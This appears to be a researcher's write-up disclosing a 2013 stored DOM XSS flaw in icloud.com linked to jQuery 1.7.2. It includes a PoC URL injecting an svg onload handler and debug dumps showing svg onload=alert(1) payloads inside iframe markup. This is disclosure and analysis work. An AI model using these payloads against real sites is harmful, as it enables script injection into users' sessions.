Stored DOM XSS, icloud.com, Javascript Injection, jQuery 1.7.2, User Agent Exploitation, May 2013

TL;DR In May 2013 XSS.Cx reported Stored XSS in www.icloud.com and all related applications due to the execution of the Javascript Protocol Handler. The Root Cause of the Issue was using Notes to inject the Code and then a Browser to View the Exploit. An Attacker could craft a malicious Note and then Share the Code with the Victim. This exploit worked in all Browsers because it was a Stored XSS Injection.

Stored XSS in icloud.com – Safari Browser Version Verification

Stored XSS is a Critical Vulnerability that neuters the Same Origin Protocol (SOP) which all Modern Browsers rely on (in an attempt) to draw Security Boundaries.

GTFO | PoC | Stored XSS

We failed to put together a Retail Proof of Concept and instead relied upon the Reader of our Bug Report to understand the execution context. Bug Reports to Apple are FREE after all and it was painfully obvious to us the Bug executed in all Major User Agent Versions. The “Screen Grab” we sent was using Dominator showing the exact line of Code that was executing the Stored Javascript Handler.

While we should have never submitted a Bug Report with only Dominator as the User Agent, the issue was Stored XSS with a Javascript Handler that would load ‘on*’, like onfocus in Chrome. The User Agent wasn’t the issue, it was our Presentation and failure to have presented a wide distribution of Risk across Major User Agents.

Apple failed to understand our PoC or follow-up with a meaningful dialogue (which hadn’t happened before), then we saw news reports and it got fixed in a hurry. We wrote about CVE-2013-1034 which clearly documented the issue. Mixing Javascript Frameworks is TOXIC; in this instance, jQuery and Sprockets. Not surprisingly, the same vulnerable Code was included with OSX Server and we wrote about CVE-2014-4406.

jQuery 1.7.1, DOM, XSS, Javascript Injection, icloud.com
jQuery 1.7.2 is vulnerable to DOM XSS

Stored DOM XSS in icloud.com Movie

PoC

https://www.icloud.com/?%22%20%3E%3C/iframe%3E%3Csvg%20onload=%22confirm%28$.expando%29%22%3E#

Debug Messages

APPLICATION NAME
keynote

TITLE
Keynote could not be loaded

MESSAGE
There was a problem loading the application due to a possible network error or missing resources. Please try again.

ORIGIN
server

TYPE
error

APP STATECHART
SC.Statechart:sc952
  initialized: true
  name: cloudos-statechart
  current-states: [
    active.springboard.displayingSpringboard.springboard
  ]
  state-transition:
    active: false
    suspended: false
  handling-event: false

MESSAGE
There was a problem loading the application due to a possible network error or missing resources. Please try again.
ORIGIN
server
TYPE
error
APP STATECHART
SC.Statechart:sc952
  initialized: true
  name: cloudos-statechart
  current-states: [
    active.springboard.displayingSpringboard.springboard
  ]
  state-transition:
    active: false
    suspended: false
  handling-event: false
CONCATLEFT
<iframe src=”https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload=”alert(1)”>x=<svg onload=”alert(1)”>” title=”Reminders” name=”reminders” tabindex=”-1″ frameBorder=”0″ id=”sc2187″ class=”atv3 sc-view app-frame sc-static-layout” style=”” >
JOIN
<iframe src=”https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload=”alert(1)”>x=<svg onload=”alert(1)”>” title=”Reminders” name=”reminders” tabindex=”-1″ frameBorder=”0″ id=”sc2187″ class=”atv3 sc-view app-frame sc-static-layout” style=”” ></iframe>
REPLACE
/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:]+)[^>]*)/>/gi, <$1></$2>
<iframe src=”https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload=”alert(1)”>x=<svg onload=”alert(1)”>” title=”Reminders” name=”reminders” tabindex=”-1″ frameBorder=”0″ id=”sc2187″ class=”atv3 sc-view app-frame sc-static-layout” style=”” ></iframe>
CONCATRIGHT
<iframe src=”https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload=”alert(1)”>x=<svg onload=”alert(1)”>” title=”Reminders” name=”reminders” tabindex=”-1″ frameBorder=”0″ id=”sc2187″ class=”atv3 sc-view app-frame sc-static-layout” style=”” ></iframe>
CONCATLEFT
<iframe src=”https://www.icloud.com/applications/reminders/current/en-us/index.html?<svg onload=”alert(1)”>x=<svg onload=”alert(1)”>” title=”Reminders” name=”reminders” tabindex=”-1″ frameBorder=”0″ id=”sc2187″ class=”atv3 sc-view app-frame sc-static-layout” style=”” ></iframe>